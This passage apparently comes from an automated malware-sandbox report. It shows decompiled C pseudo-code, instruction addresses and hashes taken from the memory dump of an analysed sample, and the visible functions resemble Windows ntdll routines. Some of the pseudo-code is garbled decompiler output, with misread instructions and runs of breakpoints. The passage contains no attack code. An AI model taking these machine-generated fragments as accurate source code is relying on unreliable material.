                                                        									goto L1;
                                                        								}
                                                        								goto L108;
                                                        						}
                                                        					}
                                                        					L56:
                                                        					_t293 = 0x25;
                                                        					asm("int 0x29");
                                                        					asm("out 0x28, al");
                                                        					 *_t293 =  *_t293 + 0x1812866;
                                                        					asm("loopne 0x29");
                                                        					 *_t293 =  *_t293 + 0x181262e;
                                                        					 *((intOrPtr*)(_t293 - 0x7ed9faff)) =  *((intOrPtr*)(_t293 - 0x7ed9faff)) - _t242;
                                                        					 *_t321 =  *_t321 + _t279;
                                                        					_pop(_t283);
                                                        					__eflags =  *_t293 & _t242;
                                                        					_t243 = _t337;
                                                        					_t339 = _t242;
                                                        					 *((intOrPtr*)(_t293 - 0x7aa4caff)) =  *((intOrPtr*)(_t293 - 0x7aa4caff)) - _t243;
                                                        					 *_t308 =  *_t308 + _t243;
                                                        					 *((intOrPtr*)(_t293 - 0x7ed77fff)) =  *((intOrPtr*)(_t293 - 0x7ed77fff)) - _t243;
                                                        					asm("daa");
                                                        					 *_t293 =  *_t293 + 0x181281e;
                                                        					_t331 = _t326 + 1 + _t326 + 1 - 1;
                                                        					 *((intOrPtr*)(_t293 - 0x7ed8a2ff)) =  *((intOrPtr*)(_t293 - 0x7ed8a2ff)) - _t243;
                                                        					_pop(_t284);
                                                        					__eflags =  *_t293 & _t243 + _t283;
                                                        					 *_t293 =  *_t293 + 0x1855c34;
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					asm("int3");
                                                        					_push(0x20);
                                                        					_push(0x18bff00);
                                                        					E0183D08C(_t284, _t321, _t331);
                                                        					_v44 =  *[fs:0x18];
                                                        					_t322 = 0;
                                                        					 *_a24 = 0;
                                                        					_t285 = _a12;
                                                        					__eflags = _t285;
                                                        					if(_t285 == 0) {
                                                        						_t248 = 0xc0000100;
                                                        					} else {
                                                        						_v8 = 0;
                                                        						_t332 = 0xc0000100;
                                                        						_v52 = 0xc0000100;
                                                        						_t250 = 4;
                                                        						while(1) {
                                                        							_v40 = _t250;
                                                        							__eflags = _t250;
                                                        							if(_t250 == 0) {
                                                        								break;
                                                        							}
                                                        							_t298 = _t250 * 0xc;
                                                        							_v48 = _t298;
                                                        							__eflags = _t285 -  *((intOrPtr*)(_t298 + 0x17c1664));
                                                        							if(__eflags <= 0) {
                                                        								if(__eflags == 0) {
                                                        									_t265 = E0182E5C0(_a8,  *((intOrPtr*)(_t298 + 0x17c1668)), _t285);
                                                        									_t339 = _t339 + 0xc;
                                                        									__eflags = _t265;
                                                        									if(__eflags == 0) {
                                                        										_t332 = E018651BE(_t285,  *((intOrPtr*)(_v48 + 0x17c166c)), _a16, _t322, _t332, __eflags, _a20, _a24);
                                                        										_v52 = _t332;
                                                        										break;
                                                        									} else {
                                                        										_t250 = _v40;
                                                        										goto L62;
                                                        									}
                                                        									goto L70;
                                                        								} else {
                                                        									L62:
                                                        									_t250 = _t250 - 1;
                                                        									continue;
                                                        								}
                                                        							}
                                                        							break;
                                                        						}
                                                        						_v32 = _t332;
                                                        						__eflags = _t332;
                                                        						if(_t332 < 0) {
                                                        							__eflags = _t332 - 0xc0000100;
                                                        							if(_t332 == 0xc0000100) {
                                                        								_t294 = _a4;
                                                        								__eflags = _t294;
                                                        								if(_t294 != 0) {
                                                        									_v36 = _t294;
                                                        									__eflags =  *_t294 - _t322;
                                                        									if( *_t294 == _t322) {
                                                        										_t332 = 0xc0000100;
                                                        										goto L76;
                                                        									} else {
                                                        										_t310 =  *((intOrPtr*)(_v44 + 0x30));
                                                        										_t252 =  *((intOrPtr*)(_t310 + 0x10));
                                                        										__eflags =  *((intOrPtr*)(_t252 + 0x48)) - _t294;
                                                        										if( *((intOrPtr*)(_t252 + 0x48)) == _t294) {
                                                        											__eflags =  *(_t310 + 0x1c);
                                                        											if( *(_t310 + 0x1c) == 0) {
                                                        												L106:
                                                        												_t332 = E01812AE4( &_v36, _a8, _t285, _a16, _a20, _a24);
                                                        												_v32 = _t332;
                                                        												__eflags = _t332 - 0xc0000100;
                                                        												if(_t332 != 0xc0000100) {
                                                        													goto L69;
                                                        												} else {
                                                        													_t322 = 1;
                                                        													_t294 = _v36;
                                                        													goto L75;
                                                        												}
                                                        											} else {
                                                        												_t255 = E017F6600( *(_t310 + 0x1c));
                                                        												__eflags = _t255;
                                                        												if(_t255 != 0) {
                                                        													goto L106;
                                                        												} else {
                                                        													_t294 = _a4;
                                                        													goto L75;
                                                        												}
                                                        											}
                                                        										} else {
                                                        											L75:
                                                        											_t332 = E01812C50(_t294, _a8, _t285, _a16, _a20, _a24, _t322);
                                                        											L76:
                                                        											_v32 = _t332;
                                                        											goto L69;
                                                        										}
                                                        									}
                                                        									goto L108;
                                                        								} else {
                                                        									E017FEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                        									_v8 = 1;
                                                        									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
                                                        									_t332 = _a24;
                                                        									_t262 = E01812AE4( &_v36, _a8, _t285, _a16, _a20, _t332);
                                                        									_v32 = _t262;
                                                        									__eflags = _t262 - 0xc0000100;
                                                        									if(_t262 == 0xc0000100) {
                                                        										_v32 = E01812C50(_v36, _a8, _t285, _a16, _a20, _t332, 1);
                                                        									}
                                                        									_v8 = _t322;
                                                        									E01812ACB();
                                                        								}
                                                        							}
                                                        						}
                                                        						L69:
                                                        						_v8 = 0xfffffffe;
                                                        						_t248 = _t332;
                                                        					}
                                                        					L70:
                                                        					return E0183D0D1(_t248);
                                                        				}
                                                        				L108:
                                                        			}

                                                        0x018126e2
                                                        0x01855b56
                                                        0x00000000
                                                        0x018126e8
                                                        0x018126f9
                                                        0x018126fb
                                                        0x018126fe
                                                        0x01812700
                                                        0x01855b60
                                                        0x00000000
                                                        0x01812706
                                                        0x01812706
                                                        0x0181270a
                                                        0x0181270a
                                                        0x0181270d
                                                        0x01812713
                                                        0x01812716
                                                        0x01812718
                                                        0x0181271c
                                                        0x0181271e
                                                        0x01855b6c
                                                        0x01855b6f
                                                        0x01855b7f
                                                        0x01855b89
                                                        0x01855b8e
                                                        0x01855b93
                                                        0x01855b96
                                                        0x01855b9c
                                                        0x01855ba0
                                                        0x01855ba3
                                                        0x01855bab
                                                        0x01855bb0
                                                        0x01855bb3
                                                        0x01855bb3
                                                        0x01855ba3
                                                        0x01812724
                                                        0x01812726
                                                        0x01812729
                                                        0x0181272c
                                                        0x0181279d
                                                        0x0181279d
                                                        0x018127a0
                                                        0x018127a2
                                                        0x00000000
                                                        0x0181272e
                                                        0x0181272e
                                                        0x01812731
                                                        0x01812734
                                                        0x01812734
                                                        0x01812736
                                                        0x01855bc1
                                                        0x01855bc1
                                                        0x01855bc4
                                                        0x00000000
                                                        0x01855bca
                                                        0x01855bca
                                                        0x01855bcd
                                                        0x00000000
                                                        0x01855bd3
                                                        0x00000000
                                                        0x01855bd3
                                                        0x01855bcd
                                                        0x0181273c
                                                        0x0181273c
                                                        0x01812742
                                                        0x01812747
                                                        0x0181274a
                                                        0x0181274d
                                                        0x01812750
                                                        0x00000000
                                                        0x01812756
                                                        0x01812756
                                                        0x00000000
                                                        0x01812902
                                                        0x01812908
                                                        0x0181290b
                                                        0x00000000
                                                        0x01812911
                                                        0x0181291c
                                                        0x01812921
                                                        0x00000000
                                                        0x01812921
                                                        0x00000000
                                                        0x00000000
                                                        0x01812880
                                                        0x01812887
                                                        0x0181288c
                                                        0x00000000
                                                        0x00000000
                                                        0x01812805
                                                        0x0181280a
                                                        0x01812814
                                                        0x01812816
                                                        0x00000000
                                                        0x00000000
                                                        0x0181281e
                                                        0x01812821
                                                        0x01812823
                                                        0x00000000
                                                        0x01812829
                                                        0x01812829
                                                        0x01812831
                                                        0x0181283c
                                                        0x0181283e
                                                        0x00000000
                                                        0x0181283e
                                                        0x00000000
                                                        0x00000000
                                                        0x0181284e
                                                        0x01812850
                                                        0x01812851
                                                        0x01812854
                                                        0x01812857
                                                        0x0181285a
                                                        0x0181285c
                                                        0x0181285d
                                                        0x00000000
                                                        0x00000000
                                                        0x0181275d
                                                        0x01812761
                                                        0x00000000
                                                        0x01812767
                                                        0x0181276e
                                                        0x01812773
                                                        0x01812773
                                                        0x01812776
                                                        0x01812778
                                                        0x0181277e
                                                        0x0181277e
                                                        0x01812781
                                                        0x01812781
                                                        0x01812783
                                                        0x01812784
                                                        0x00000000
                                                        0x00000000
                                                        0x01855bd8
                                                        0x01855bde
                                                        0x01855be4
                                                        0x01855be6
                                                        0x01855be8
                                                        0x01855be9
                                                        0x01855bee
                                                        0x01855bf8
                                                        0x01855bff
                                                        0x01855c01
                                                        0x01855c04
                                                        0x01855c07
                                                        0x01855c0b
                                                        0x01855c0d
                                                        0x01855c0d
                                                        0x01855c15
                                                        0x01855c18
                                                        0x01855c1b
                                                        0x01855c1b
                                                        0x01855c1e
                                                        0x00000000
                                                        0x00000000
                                                        0x018128c3
                                                        0x018128c8
                                                        0x018128d2
                                                        0x018128d4
                                                        0x018128d8
                                                        0x018128db
                                                        0x01855c26
                                                        0x01855c28
                                                        0x01855c2d
                                                        0x01855c2d
                                                        0x00000000
                                                        0x00000000
                                                        0x01855c34
                                                        0x01855c36
                                                        0x01855c49
                                                        0x01855c4e
                                                        0x01855c54
                                                        0x01855c5b
                                                        0x01855c5d
                                                        0x01855c60
                                                        0x01812788
                                                        0x01812788
                                                        0x0181278b
                                                        0x0181278e
                                                        0x0181278e
                                                        0x0181278e
                                                        0x01812791
                                                        0x00000000
                                                        0x00000000
                                                        0x01812756
                                                        0x01812750
                                                        0x00000000
                                                        0x01812794
                                                        0x01812794
                                                        0x01812795
                                                        0x01812798
                                                        0x01812798
                                                        0x00000000
                                                        0x01812734
                                                        0x0181272c
                                                        0x01812700
                                                        0x018125ef
                                                        0x018125ef
                                                        0x018125ef
                                                        0x018125f2
                                                        0x018125f8
                                                        0x00000000
                                                        0x00000000
                                                        0x018125fe
                                                        0x00000000
                                                        0x018128e6
                                                        0x018128ec
                                                        0x018128ef
                                                        0x018128f5
                                                        0x018128f8
                                                        0x018128f8
                                                        0x00000000
                                                        0x018128f8
                                                        0x00000000
                                                        0x00000000
                                                        0x01812866
                                                        0x01812866
                                                        0x01812876
                                                        0x01812879
                                                        0x00000000
                                                        0x00000000
                                                        0x018127e0
                                                        0x018127e7
                                                        0x018127e9
                                                        0x018127eb
                                                        0x01855afd
                                                        0x00000000
                                                        0x01855afd
                                                        0x00000000
                                                        0x00000000
                                                        0x01812633
                                                        0x01812638
                                                        0x0181263b
                                                        0x0181263c
                                                        0x0181263e
                                                        0x01812640
                                                        0x01812642
                                                        0x01812647
                                                        0x01812649
                                                        0x0181264e
                                                        0x01812650
                                                        0x01812653
                                                        0x01812659
                                                        0x018126a2
                                                        0x018126a7
                                                        0x018126ac
                                                        0x018126b2
                                                        0x01855b11
                                                        0x01855b15
                                                        0x01855b17
                                                        0x00000000
                                                        0x018126b8
                                                        0x018126b8
                                                        0x018126ba
                                                        0x018127a6
                                                        0x018127a6
                                                        0x018127a9
                                                        0x018127ab
                                                        0x018127b9
                                                        0x018127b9
                                                        0x018127be
                                                        0x018127c1
                                                        0x018127c3
                                                        0x018127c5
                                                        0x018127c7
                                                        0x01855c74
                                                        0x01855c79
                                                        0x01855c79
                                                        0x018127c7
                                                        0x00000000
                                                        0x018126c0
                                                        0x018126c0
                                                        0x018126c3
                                                        0x018126c6
                                                        0x018126c6
                                                        0x018126c9
                                                        0x018126c9
                                                        0x00000000
                                                        0x018126c9
                                                        0x018126ba
                                                        0x0181265b
                                                        0x0181265b
                                                        0x0181265e
                                                        0x01812667
                                                        0x0181266d
                                                        0x01812677
                                                        0x0181267c
                                                        0x0181267f
                                                        0x01812681
                                                        0x01855b49
                                                        0x01855b4e
                                                        0x018127cd
                                                        0x018127d0
                                                        0x018127d1
                                                        0x018127d2
                                                        0x018127d4
                                                        0x018127dd
                                                        0x01812687
                                                        0x01812687
                                                        0x0181268a
                                                        0x0181268b
                                                        0x0181268e
                                                        0x0181268f
                                                        0x01812691
                                                        0x01812696
                                                        0x01812698
                                                        0x0181269d
                                                        0x0181269f
                                                        0x00000000
                                                        0x0181269f
                                                        0x01812681
                                                        0x00000000
                                                        0x00000000
                                                        0x01812846
                                                        0x00000000
                                                        0x00000000
                                                        0x01812605
                                                        0x0181260a
                                                        0x0181260c
                                                        0x01812611
                                                        0x01812616
                                                        0x01812619
                                                        0x01812619
                                                        0x0181261e
                                                        0x00000000
                                                        0x01812624
                                                        0x01812627
                                                        0x01812627
                                                        0x00000000
                                                        0x00000000
                                                        0x01855b1f
                                                        0x00000000
                                                        0x00000000
                                                        0x01812894
                                                        0x0181289b
                                                        0x0181289d
                                                        0x018128a1
                                                        0x01855b2b
                                                        0x01855b2e
                                                        0x01855b2e
                                                        0x018128a7
                                                        0x018128a9
                                                        0x01855b04
                                                        0x01855b09
                                                        0x01855b09
                                                        0x01855b09
                                                        0x00000000
                                                        0x00000000
                                                        0x01855b35
                                                        0x01855b3c
                                                        0x018128fb
                                                        0x018128fb
                                                        0x018126cc
                                                        0x018126cc
                                                        0x018126d0
                                                        0x00000000
                                                        0x018126d2
                                                        0x018126d2
                                                        0x00000000
                                                        0x018126d2
                                                        0x00000000
                                                        0x00000000
                                                        0x018125fe
                                                        0x0181292d
                                                        0x0181292f
                                                        0x01812930
                                                        0x01812935
                                                        0x01812937
                                                        0x0181293d
                                                        0x0181293f
                                                        0x01812946
                                                        0x0181294c
                                                        0x0181294e
                                                        0x0181294f
                                                        0x01812951
                                                        0x01812951
                                                        0x01812952
                                                        0x01812958
                                                        0x0181295a
                                                        0x01812962
                                                        0x01812963
                                                        0x01812969
                                                        0x0181296a
                                                        0x01812972
                                                        0x01812973
                                                        0x01812977
                                                        0x0181297d
                                                        0x0181297e
                                                        0x0181297f
                                                        0x01812980
                                                        0x01812981
                                                        0x01812982
                                                        0x01812983
                                                        0x01812984
                                                        0x01812985
                                                        0x01812986
                                                        0x01812987
                                                        0x01812988
                                                        0x01812989
                                                        0x0181298a
                                                        0x0181298b
                                                        0x0181298c
                                                        0x0181298d
                                                        0x0181298e
                                                        0x0181298f
                                                        0x01812990
                                                        0x01812992
                                                        0x01812997
                                                        0x018129a3
                                                        0x018129a6
                                                        0x018129ab
                                                        0x018129ad
                                                        0x018129b0
                                                        0x018129b2
                                                        0x01855c80
                                                        0x018129b8

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PATH
                                                        • API String ID: 0-1036084923
                                                        • Opcode ID: c39ec68c595d7869a853135641d74688f6510ab23d64999dc1d1bac731885a49
                                                        • Instruction ID: 66152acf4026efabc9dede9f9d73778461555650e7b8c4fc1a9a0199b8aabf5d
                                                        • Opcode Fuzzy Hash: c39ec68c595d7869a853135641d74688f6510ab23d64999dc1d1bac731885a49
                                                        • Instruction Fuzzy Hash: CFC1C1B2D00219DFCB25DF9DD880BAEBBB6FF48710F544429E901EB254D734AA41CB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 80%
                                                        			E0181FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                                                        				char _v5;
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				char _v16;
                                                        				char _v17;
                                                        				char _v20;
                                                        				signed int _v24;
                                                        				char _v28;
                                                        				char _v32;
                                                        				signed int _v40;
                                                        				void* __ecx;
                                                        				void* __edi;
                                                        				void* __ebp;
                                                        				signed int _t73;
                                                        				intOrPtr* _t75;
                                                        				signed int _t77;
                                                        				signed int _t79;
                                                        				signed int _t81;
                                                        				intOrPtr _t83;
                                                        				intOrPtr _t85;
                                                        				intOrPtr _t86;
                                                        				signed int _t91;
                                                        				signed int _t94;
                                                        				signed int _t95;
                                                        				signed int _t96;
                                                        				signed int _t106;
                                                        				signed int _t108;
                                                        				signed int _t114;
                                                        				signed int _t116;
                                                        				signed int _t118;
                                                        				signed int _t122;
                                                        				signed int _t123;
                                                        				void* _t129;
                                                        				signed int _t130;
                                                        				void* _t132;
                                                        				intOrPtr* _t134;
                                                        				signed int _t138;
                                                        				signed int _t141;
                                                        				signed int _t147;
                                                        				intOrPtr _t153;
                                                        				signed int _t154;
                                                        				signed int _t155;
                                                        				signed int _t170;
                                                        				void* _t174;
                                                        				signed int _t176;
                                                        				signed int _t177;
                                                        
                                                        				_t129 = __ebx;
                                                        				_push(_t132);
                                                        				_push(__esi);
                                                        				_t174 = _t132;
                                                        				_t73 =  !( *( *(_t174 + 0x18)));
                                                        				if(_t73 >= 0) {
                                                        					L5:
                                                        					return _t73;
                                                        				} else {
                                                        					E017FEEF0(0x18d7b60);
                                                        					_t134 =  *0x18d7b84; // 0x771a7b80
                                                        					_t2 = _t174 + 0x24; // 0x24
                                                        					_t75 = _t2;
                                                        					if( *_t134 != 0x18d7b80) {
                                                        						_push(3);
                                                        						asm("int 0x29");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						asm("int3");
                                                        						_push(0x18d7b60);
                                                        						_t170 = _v8;
                                                        						_v28 = 0;
                                                        						_v40 = 0;
                                                        						_v24 = 0;
                                                        						_v17 = 0;
                                                        						_v32 = 0;
                                                        						__eflags = _t170 & 0xffff7cf2;
                                                        						if((_t170 & 0xffff7cf2) != 0) {
                                                        							L43:
                                                        							_t77 = 0xc000000d;
                                                        						} else {
                                                        							_t79 = _t170 & 0x0000000c;
                                                        							__eflags = _t79;
                                                        							if(_t79 != 0) {
                                                        								__eflags = _t79 - 0xc;
                                                        								if(_t79 == 0xc) {
                                                        									goto L43;
                                                        								} else {
                                                        									goto L9;
                                                        								}
                                                        							} else {
                                                        								_t170 = _t170 | 0x00000008;
                                                        								__eflags = _t170;
                                                        								L9:
                                                        								_t81 = _t170 & 0x00000300;
                                                        								__eflags = _t81 - 0x300;
                                                        								if(_t81 == 0x300) {
                                                        									goto L43;
                                                        								} else {
                                                        									_t138 = _t170 & 0x00000001;
                                                        									__eflags = _t138;
                                                        									_v24 = _t138;
                                                        									if(_t138 != 0) {
                                                        										__eflags = _t81;
                                                        										if(_t81 != 0) {
                                                        											goto L43;
                                                        										} else {
                                                        											goto L11;
                                                        										}
                                                        									} else {
                                                        										L11:
                                                        										_push(_t129);
                                                        										_t77 = E017F6D90( &_v20);
                                                        										_t130 = _t77;
                                                        										__eflags = _t130;
                                                        										if(_t130 >= 0) {
                                                        											_push(_t174);
                                                        											__eflags = _t170 & 0x00000301;
                                                        											if((_t170 & 0x00000301) == 0) {
                                                        												_t176 = _a8;
                                                        												__eflags = _t176;
                                                        												if(__eflags == 0) {
                                                        													L64:
                                                        													_t83 =  *[fs:0x18];
                                                        													_t177 = 0;
                                                        													__eflags =  *(_t83 + 0xfb8);
                                                        													if( *(_t83 + 0xfb8) != 0) {
                                                        														E017F76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                                                        														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                                                        													}
                                                        													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                                                        													goto L15;
                                                        												} else {
                                                        													asm("sbb edx, edx");
                                                        													_t114 = E01888938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                                                        													__eflags = _t114;
                                                        													if(_t114 < 0) {
                                                        														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                                                        														E017EB150();
                                                        													}
                                                        													_t116 = E01886D81(_t176,  &_v16);
                                                        													__eflags = _t116;
                                                        													if(_t116 >= 0) {
                                                        														__eflags = _v16 - 2;
                                                        														if(_v16 < 2) {
                                                        															L56:
                                                        															_t118 = E017F75CE(_v20, 5, 0);
                                                        															__eflags = _t118;
                                                        															if(_t118 < 0) {
                                                        																L67:
                                                        																_t130 = 0xc0000017;
                                                        																goto L32;
                                                        															} else {
                                                        																__eflags = _v12;
                                                        																if(_v12 == 0) {
                                                        																	goto L67;
                                                        																} else {
                                                        																	_t153 =  *0x18d8638; // 0x0
                                                        																	_t122 = L017F38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                                                        																	_t154 = _v12;
                                                        																	_t130 = _t122;
                                                        																	__eflags = _t130;
                                                        																	if(_t130 >= 0) {
                                                        																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                                                        																		__eflags = _t123;
                                                        																		if(_t123 != 0) {
                                                        																			_t155 = _a12;
                                                        																			__eflags = _t155;
                                                        																			if(_t155 != 0) {
                                                        																				 *_t155 = _t123;
                                                        																			}
                                                        																			goto L64;
                                                        																		} else {
                                                        																			E017F76E2(_t154);
                                                        																			goto L41;
                                                        																		}
                                                        																	} else {
                                                        																		E017F76E2(_t154);
                                                        																		_t177 = 0;
                                                        																		goto L18;
                                                        																	}
                                                        																}
                                                        															}
                                                        														} else {
                                                        															__eflags =  *_t176;
                                                        															if( *_t176 != 0) {
                                                        																goto L56;
                                                        															} else {
                                                        																__eflags =  *(_t176 + 2);
                                                        																if( *(_t176 + 2) == 0) {
                                                        																	goto L64;
                                                        																} else {
                                                        																	goto L56;
                                                        																}
                                                        															}
                                                        														}
                                                        													} else {
                                                        														_t130 = 0xc000000d;
                                                        														goto L32;
                                                        													}
                                                        												}
                                                        												goto L35;
                                                        											} else {
                                                        												__eflags = _a8;
                                                        												if(_a8 != 0) {
                                                        													_t77 = 0xc000000d;
                                                        												} else {
                                                        													_v5 = 1;
                                                        													L0181FCE3(_v20, _t170);
                                                        													_t177 = 0;
                                                        													__eflags = 0;
                                                        													L15:
                                                        													_t85 =  *[fs:0x18];
                                                        													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                                                        													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                                                        														L18:
                                                        														__eflags = _t130;
                                                        														if(_t130 != 0) {
                                                        															goto L32;
                                                        														} else {
                                                        															__eflags = _v5 - _t130;
                                                        															if(_v5 == _t130) {
                                                        																goto L32;
                                                        															} else {
                                                        																_t86 =  *[fs:0x18];
                                                        																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                                                        																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                                                        																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                                                        																}
                                                        																__eflags = _t177;
                                                        																if(_t177 == 0) {
                                                        																	L31:
                                                        																	__eflags = 0;
                                                        																	L017F70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                                                        																	goto L32;
                                                        																} else {
                                                        																	__eflags = _v24;
                                                        																	_t91 =  *(_t177 + 0x20);
                                                        																	if(_v24 != 0) {
                                                        																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                                                        																		goto L31;
                                                        																	} else {
                                                        																		_t141 = _t91 & 0x00000040;
                                                        																		__eflags = _t170 & 0x00000100;
                                                        																		if((_t170 & 0x00000100) == 0) {
                                                        																			__eflags = _t141;
                                                        																			if(_t141 == 0) {
                                                        																				L74:
                                                        																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                                                        																				goto L27;
                                                        																			} else {
                                                        																				_t177 = E0181FD22(_t177);
                                                        																				__eflags = _t177;
                                                        																				if(_t177 == 0) {
                                                        																					goto L42;
                                                        																				} else {
                                                        																					_t130 = E0181FD9B(_t177, 0, 4);
                                                        																					__eflags = _t130;
                                                        																					if(_t130 != 0) {
                                                        																						goto L42;
                                                        																					} else {
                                                        																						_t68 = _t177 + 0x20;
                                                        																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                                                        																						__eflags =  *_t68;
                                                        																						_t91 =  *(_t177 + 0x20);
                                                        																						goto L74;
                                                        																					}
                                                        																				}
                                                        																			}
                                                        																			goto L35;
                                                        																		} else {
                                                        																			__eflags = _t141;
                                                        																			if(_t141 != 0) {
                                                        																				_t177 = E0181FD22(_t177);
                                                        																				__eflags = _t177;
                                                        																				if(_t177 == 0) {
                                                        																					L42:
                                                        																					_t77 = 0xc0000001;
                                                        																					goto L33;
                                                        																				} else {
                                                        																					_t130 = E0181FD9B(_t177, 0, 4);
                                                        																					__eflags = _t130;
                                                        																					if(_t130 != 0) {
                                                        																						goto L42;
                                                        																					} else {
                                                        																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                                                        																						_t91 =  *(_t177 + 0x20);
                                                        																						goto L26;
                                                        																					}
                                                        																				}
                                                        																				goto L35;
                                                        																			} else {
                                                        																				L26:
                                                        																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                                                        																				__eflags = _t94;
                                                        																				L27:
                                                        																				 *(_t177 + 0x20) = _t94;
                                                        																				__eflags = _t170 & 0x00008000;
                                                        																				if((_t170 & 0x00008000) != 0) {
                                                        																					_t95 = _a12;
                                                        																					__eflags = _t95;
                                                        																					if(_t95 != 0) {
                                                        																						_t96 =  *_t95;
                                                        																						__eflags = _t96;
                                                        																						if(_t96 != 0) {
                                                        																							 *((short*)(_t177 + 0x22)) = 0;
                                                        																							_t40 = _t177 + 0x20;
                                                        																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                                                        																							__eflags =  *_t40;
                                                        																						}
                                                        																					}
                                                        																				}
                                                        																				goto L31;
                                                        																			}
                                                        																		}
                                                        																	}
                                                        																}
                                                        															}
                                                        														}
                                                        													} else {
                                                        														_t147 =  *( *[fs:0x18] + 0xfc0);
                                                        														_t106 =  *(_t147 + 0x20);
                                                        														__eflags = _t106 & 0x00000040;
                                                        														if((_t106 & 0x00000040) != 0) {
                                                        															_t147 = E0181FD22(_t147);
                                                        															__eflags = _t147;
                                                        															if(_t147 == 0) {
                                                        																L41:
                                                        																_t130 = 0xc0000001;
                                                        																L32:
                                                        																_t77 = _t130;
                                                        																goto L33;
                                                        															} else {
                                                        																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                                                        																_t106 =  *(_t147 + 0x20);
                                                        																goto L17;
                                                        															}
                                                        															goto L35;
                                                        														} else {
                                                        															L17:
                                                        															_t108 = _t106 | 0x00000080;
                                                        															__eflags = _t108;
                                                        															 *(_t147 + 0x20) = _t108;
                                                        															 *( *[fs:0x18] + 0xfc0) = _t147;
                                                        															goto L18;
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        											L33:
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L35:
                                                        						return _t77;
                                                        					} else {
                                                        						 *_t75 = 0x18d7b80;
                                                        						 *((intOrPtr*)(_t75 + 4)) = _t134;
                                                        						 *_t134 = _t75;
                                                        						 *0x18d7b84 = _t75;
                                                        						_t73 = E017FEB70(_t134, 0x18d7b60);
                                                        						if( *0x18d7b20 != 0) {
                                                        							_t73 =  *( *[fs:0x30] + 0xc);
                                                        							if( *((char*)(_t73 + 0x28)) == 0) {
                                                        								_t73 = E017FFF60( *0x18d7b20);
                                                        							}
                                                        						}
                                                        						goto L5;
                                                        					}
                                                        				}
                                                        			}


                                                        Strings
                                                        • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0185BE0F
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.431531509.00000000017C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017C0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_17c0000_SecuriteInfo.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                                        • API String ID: 0-865735534
                                                        • Opcode ID: d11d8bb6fae9750320e475669c0e11b7a1870a6ba17441dfe8ebcfdf6a58d716
                                                        • Instruction ID: bcc0a151b98bf71f02d911ea776af6c810daac8affe952a00259fbea905f16a2
                                                        • Opcode Fuzzy Hash: d11d8bb6fae9750320e475669c0e11b7a1870a6ba17441dfe8ebcfdf6a58d716
                                                        • Instruction Fuzzy Hash: 2AA13372B006168BEB25CB6CC450B7AB7A9FF58724F04456DEB06CB385DB34DA09DB80
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 63%
                                                        			E017E2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                                                        				signed char _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				intOrPtr _v28;
                                                        				intOrPtr _v32;
                                                        				signed int _v52;
                                                        				void* __esi;
                                                        				void* __ebp;
                                                        				intOrPtr _t55;
                                                        				signed int _t57;
                                                        				signed int _t58;
                                                        				char* _t62;
                                                        				signed char* _t63;
